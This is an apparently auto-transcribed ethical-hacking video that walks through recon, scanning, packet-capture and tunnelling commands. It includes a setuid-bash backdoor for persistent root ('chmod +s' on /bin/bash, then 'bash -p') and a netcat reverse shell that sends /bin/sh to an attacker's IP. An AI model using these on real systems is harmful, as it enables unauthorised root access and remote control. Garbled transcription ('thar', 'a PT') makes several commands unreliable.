if I were doing a legit pin test, I&#39;d probably let this finish out
but I don&#39;t have time for that. I&#39;m not patient enough
Control C to stop that. I want to show you another way
to do subdomain enumeration. This tool is called sub lister.
You can install it with a PT, install sub lister just like
this and the E is a three. And then to run sub lister, we&#39;ll simply type in sub lister dash D
to specify our domain network check.com and let it go. And it found a lot of
stuff. This next one is pretty fun. It&#39;s called WP Scan. It will scan WordPress sites and help
you find all the issues that might be affecting it. Great. If you&#39;re a
WordPress site owner and great, you&#39;re a pen tester, let&#39;s try it
out. We can run it in a few ways. The first way WP scan, we&#39;ll do
dash dash URL and specify our URL. We&#39;ll do chuck keith.com, my personal
website that&#39;s not doing anything. And then we&#39;ll do dash enumerates you, not you the letter you the U
stands for users, let&#39;s try it out. That&#39;s a lot of information. We can
also use the P option for plugins. We can use T for themes or do
something pretty aggressive. We&#39;ll do VP VT dash plugins, dash detection and we&#39;ll add aggressive
at the end just to make sure we get our point across. This is a super aggressive
vulnerability scan. Let&#39;s try it out. Now you may have noticed that all those
commands did not output anything fun because you need an
API token from WP scan, which you can get for free right now. And then you would run the commands like
this specifying your API token with a dash API dash token switch. A mass is
another tool you can use for subdomain. Enumeration. Install it with a PT install
and to run it we&#39;ll type in a mass, type in enu dash adidas specifier
domain network chuck.com and let it go. This tool might run forever. Alright,
I don&#39;t want to wait for it though. Control C to stop that. But man, look at all the stuff about to
do a more passive enumeration. You can do this a mass and
we&#39;ll specify a dash passive and then our domain, whereas the
other one was a bit more active. I like AMA because it does give us options
based on what our scope is and we&#39;ll go ahead and stop that. This next command
opens up the door to new commands. What does that mean? You&#39;ll
see it&#39;s a tool called gi, which we&#39;ll often use when you first
start out to interact with GitHub. Let me show you. There&#39;s a tool we&#39;re
about to use called Search point, but the way we use this tool is by
downloading it from GitHub and actually I lied, this is a GitLab repository,
but it&#39;s pretty much the same thing. You&#39;ll use GI all the time to
install all kinds of stuff, but first we have to install GI A
PT Install Get you probably already have it. And then probably my
favorite command is GI Clone. We&#39;re going to clone a tool onto our
computer and in our case it will be search point. Let&#39;s go to properly use that
command, we&#39;ll add a symbolic link. We&#39;re not going to talk about that,
just know it&#39;s a command below. And then finally we can use the
command search exploit, right? Yeah, it&#39;s going to work. Let&#39;s try
searching for WordPress plugins. It&#39;ll search for exploits that involve
WordPress plugins. What about SSH? A ton of exploits pertaining to SSH Super
handy tool if you want to update the database search exploit
dash u crazy powerful tool. Now here&#39;s John Hammond
with a real hacking command.
It&#39;s kind of awesome. Let. Me get into the real genuine ethical
hacking and penetration testing. My favorite top hacking
command. Here&#39;s the thing, when you&#39;re on the command line
interacting with the shell, you&#39;re actually running this program
called Bash or the born again shell. Now that lives on the file
system and slash bin bash. So if I were to actually execute this,
it doesn&#39;t look like it does anything, I just get the prompt back because I&#39;ve
just invoked and I&#39;m running a shell or terminal inside my shell so I could
exit out of that and get back to my original prompt. But Ben Bash actually takes a
special argument called TAC P and that will enforce and
maintain set UID permissions, which means that the
owner of the file root, in this case the admin absolute controller
of the computer will be able to keep their permissions but it
has to be a set UID binary. So the way that we could do that
is to actually change mod or CH modifications, change modifications on the
file and add or plus the S letter for set UID. We&#39;ll put that on Bin Bash and
this will require some root privileges. That means that you need to be the
admin to be able to configure this. But what that ultimately does is
create a back door or you have a persistence mechanism, a little bit of a foothold so that at
any point if we configure this with our pseudo password later on down the line, you get access to this
machine one more time. Now you can just run bash tack P and you are root, you control the whole
machine because you are the admin user. You set up that back
door. If you wanted to, you could move into the root directory
and you could do anything that you want. Maybe we could echo hello into a please subscribe to network Chuck, I&#39;ll hit enter on that. And now if
I zoom out, let me show you this. LS Tech LA we can see
our file right there. Please subscribe to network Chuck. Hey, just owned and controlled by the root
user and we were able to configure that with our back door. Pseudo
CH mod plus S bin Bash. That is my favorite top hacking
command because then you&#39;ve got a backdoor, you&#39;ve got a persistence mechanism
and a way to become root at any point. I hope you enjoyed a couple of those.
Really neat Hey top hacking commands. But thank you so much network Chuck
for letting me join the party here. This was an absolute blast. Now I&#39;m going to do something bad. I&#39;m
going to do the same command twice. What? No, I know. It&#39;s okay. We&#39;re going
to talk about TCP dump again. Why? Well because there&#39;s more cool stuff about
it and we didn&#39;t give it enough time. We&#39;ll type in TCP dump, we&#39;ll type
in dash W to send it to a file. We&#39;ll just call it capture dot pcap. Then dash I for our interface
and we&#39;ll do ethernet zero. That&#39;s the one I have now lemme just make
sure that&#39;s the case. IP address, yes, ethernet zero and go. And
we&#39;ll generate some traffic, do something fun that we&#39;ve already
learned and map with random addresses. Decoys. We&#39;ll stop that with CTRL C. We can analyze that
traffic with this command. TCP dump dash r specify our capture
file which just capture pcap. Let&#39;s take a look. Cool. We can see we can also limit the amount
of packets we capture with TCP dump and the switch dash C for counts. And
we&#39;ll say like 100 that did not long. Now TCP dump is pretty cool. Great for quick captures but the real
tool you want to use that&#39;s crazy powerful is thar the command line
brother of Wireshark. To install thar we&#39;ll do a PT
install thar thar can do a lot. Let&#39;s try a few things. First we&#39;ll type
in thar and we&#39;ll capture one packet, just one. We&#39;ll put it in
verbose mode with dash capital V, we&#39;ll do dash C for count.
We&#39;ll do one and then dash IE, the 9 0 1 packet captured. And then
look at all the stuff it shows us. That is so powerful. Networking geeks
are just drooling. So yes, I&#39;m drooling. Do you want to see something
crazier filters. Watch this T-shirt. We&#39;ll do a dash y to apply a display
filter and with this single quote we&#39;ll specify we&#39;ll do http request method space equals equals and a double quotes
get and then close it out with a single quote. I know it&#39;s kind of wordy but check
this out. Let&#39;s specify our interface get at zero and we&#39;re now capturing only
showing get request. How cool is that? Let&#39;s generate some curl
academy.network chuck.com. There&#39;s another one that&#39;s so cool. Now one of the most powerful ways we
can use thar is by analyzing packet captures. So let&#39;s do a capture real
quick to a file thar and actually no, I&#39;m going to show you one cool thing. We&#39;ll use a command called timeout and
put in 15 seconds and it&#39;ll time out or stop this packet capture in 15
seconds. That&#39;s pretty cool. Thar dash I ethernet zero and
with a dash w command similar to TCP dump. We&#39;ll send that to
a file thar dash p app me. Try to generate some quick traffic
and done to display statistics and specifically to follow
endpoint connections. Use this command thar dash
r, we&#39;ll specify our capture, which was thar pcap. Then we&#39;ll use the switches dash
qz and specify endpoints ip. How cool is that? We could also follow A TCP stream with
thar dash RR capture dash qz and we&#39;ll say follow comma TCP. And
we&#39;ll put that in ask E. So ask E, we&#39;ll do comma, we&#39;ll follow
the seventh stream. That&#39;s pretty cool. Let&#39;s try, I dunno, the first
stream. First stream&#39;s crazy. Let&#39;s do the 20th stream, the
hundred stream. So powerful. We can also simply do custom output
of fields based on the capture we&#39;re reviewing. Check this out thar
do a dash e IP source dash e IP desk or DST dash e framed protocols. Notice we&#39;re specifying fields.
We&#39;ll do a dash T fields, which is telling it to only output
the fields we&#39;re specifying. And then finally dash r specifying our
capture. How cool is that? So powerful. This is my new favorite tool. Tux a terminal multiplexer
install tux with APT install tux. And then simply type in tm. We suddenly have a new terminal
that we can do stuff in like ping academy.network chuck.com,
leave that there. Hit control B and then D on your
keyboard, you&#39;re detached from it. And then with tux A get right
back to it. How powerful is that? I&#39;ll stop type in exit to close that out. We can create multiple sessions
and name them. So team UX, new dash S and name it Bob, here&#39;s
Bob. We&#39;ll ping something here. Detach from that for
another session, Susie. Now if I type in tux ls, I&#39;ve got two sessions and I can
reattach to either of them, team ux, a dash t to specify my target will
say Susie jumping right back in there. I can hit control B and then W to
quickly jump between my various team Uck sessions and I can leave,
go to another computer, jump back in here and connect
to any one of these sessions. If you want to learn more, I did a whole
video on team UX right up here. SSH. We use it all the time to remote
into our systems. So for example, this Ubuntu guy to jump into him, I&#39;ll use SSH Ss H network
Chuck at his IP address already. Cool. But it can do
more. Instead of logging in, I can actually just run a command via
SS H on another system with SSH network. Chuck at my server. And then right after
that specify the command I want to run. So in single quotes I can say, who am I? BAM or IP address. Crazy powerful. Let&#39;s get crazier. You
can actually make it a SOX proxy. What? Watch this. Before I create the tunnel, lemme demonstrate my location right now
what&#39;s my IP address? I&#39;m in Dallas, Texas as you can see right here.
But if I use this crazy SSH command, I&#39;ll create a proxy and tunnel
myself somewhere else. SSH dash D, which is telling it to create a SOX
proxy. And I&#39;ll say port 1, 3, 3, 7. We&#39;ll do a dash C for compression dash
Q for quiet mode and dash N to not execute any commands. And finally
our server information root at, and this will be a server in
Japan. Put our password in. Now we&#39;re going to launch chromium
using that proxy. Our SOX five, the local host. Ready, set,
go. Chromium&#39;s launched. Now I&#39;ll see where we are already
feel a bit different and giving them, having a hard time figuring out where
to go. I&#39;m definitely in Osaka, Japan. Super cool, right Netcat our go-to
for reverse shells. To install netcat, we&#39;ll do a PT install
netcat dash traditional. To verify, just type in NC dash H and with Netcat
installed on both your attacking computer and your target computer. Let&#39;s do
a reverse shell on the attacker. All we got to do is wait, wait for the shell type in
NC dash LVP and the port. You&#39;re waiting on 1 3, 3 7. We&#39;re
waiting because on a reverse shell, the target reaches out to us On the
target side, we&#39;ll type in NC for netcat, we&#39;ll do a dash e and specify the
shell we want to have access to. So we&#39;ll do slash ben slash
sh specify our attacker ip, which is us and the port 1, 3, 3, 7 that
the attacker is listening on and they one hit enter if something happened.
It sure stinking did check it out. I&#39;m on the other computer.
I&#39;ve got a reverse shell. They can also do a fun thing where you
just set a simple chat server with net cap. Why? I don&#39;t know. But you can
do it. You should try it. It&#39;s fun. On one side you type in NC dash
LVP, set up port on the other side, type in NC dash V, the IP address of the other
computer and the port. So now I can say hey and I
get hey, on the other side, what are you thinking about
the end of this video? Me too. I&#39;ll catch you guys
next time. For real though.

Transcript for:Top 60 Hacking Commands

Transcript for:
Top 60 Hacking Commands